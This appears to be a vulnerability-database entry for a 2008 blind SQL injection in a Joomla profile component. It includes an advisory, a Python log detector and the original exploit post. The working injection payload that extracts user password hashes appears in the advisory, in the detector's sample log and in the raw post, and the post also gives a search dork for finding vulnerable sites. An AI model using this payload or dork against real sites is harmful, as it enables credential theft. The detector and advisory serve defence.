Vendor: Profiler
By: $hur!k'n
CVSS: 7.5 (HIGH)
Blind SQL Injection
CWE: 89
Product Name: Profiler
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Joomla Component Profiler Blind SQL Injection

An attacker can exploit this vulnerability by sending crafted SQL in the vulnerable 'user' parameter of the URL. The injected SQL is executed by the backend database, and the result is returned in the response. An example of such a request is '/index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*'

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update their installations to the latest version.
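
A log check for the request pattern described above, as an added example that is not part of the original advisory: it parses web access-log lines and flags com_comprofiler requests whose 'user' value is not a plain integer. The log lines and client addresses are constructed, and treating legitimate 'user' values as numeric IDs is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format); addresses are documentation IPs.
SAMPLE_LOG = """\
192.0.2.10 - - [23/Apr/2008:10:00:01 +0000] "GET /index.php?option=com_comprofiler&task=userProfile&user=62 HTTP/1.1" 200 5120
192.0.2.77 - - [23/Apr/2008:10:00:05 +0000] "GET /index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/* HTTP/1.1" 200 5120
192.0.2.77 - - [23/Apr/2008:10:00:06 +0000] "GET /index.php?option=com_comprofiler&task=userProfile&user=1%2F%2A%2A%2Fand%2F%2A%2A%2F1 HTTP/1.1" 200 5120
192.0.2.11 - - [23/Apr/2008:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 2048
"""

# Client address, then the quoted request line; the target contains no spaces.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
# Assumption: a legitimate 'user' value is a numeric ID.
NUMERIC_ID = re.compile(r"[0-9]+")


def suspicious_profiler_requests(log_text):
    """Return (client, decoded_user_value) for com_comprofiler requests
    whose 'user' parameter is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line we understand
        client, target = match.groups()
        # parse_qs percent-decodes values, so encoded payloads are caught too.
        params = parse_qs(urlsplit(target).query)
        if "com_comprofiler" not in params.get("option", []):
            continue  # a different component
        for value in params.get("user", []):
            if not NUMERIC_ID.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_profiler_requests(SAMPLE_LOG):
        print(f"{client}\tnon-numeric user value: {value!r}")
```

The same integer-only rule can be enforced in front of an unpatched installation while the update is being rolled out.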
Source

Exploit-DB raw data:

#########################################################
#							#
#     Joomla Component Profiler Blind SQL Injection	#
#							#
#########################################################


########################################

[~] Vulnerability found by: $hur!k'n
[~] Contact: alibabanala@hotmail.com

########################################

[~] ScriptName: "Joomla"
[~] ModuleName: "Profiler"
[~] Version: ? 

########################################

[~] DORK: allinurl:com_comprofiler

########################################

[~] Exploit: /index.php?option=com_comprofiler&task=userProfile&user=[SQL]
[~] Example: /index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*

########################################

# milw0rm.com [2008-04-23]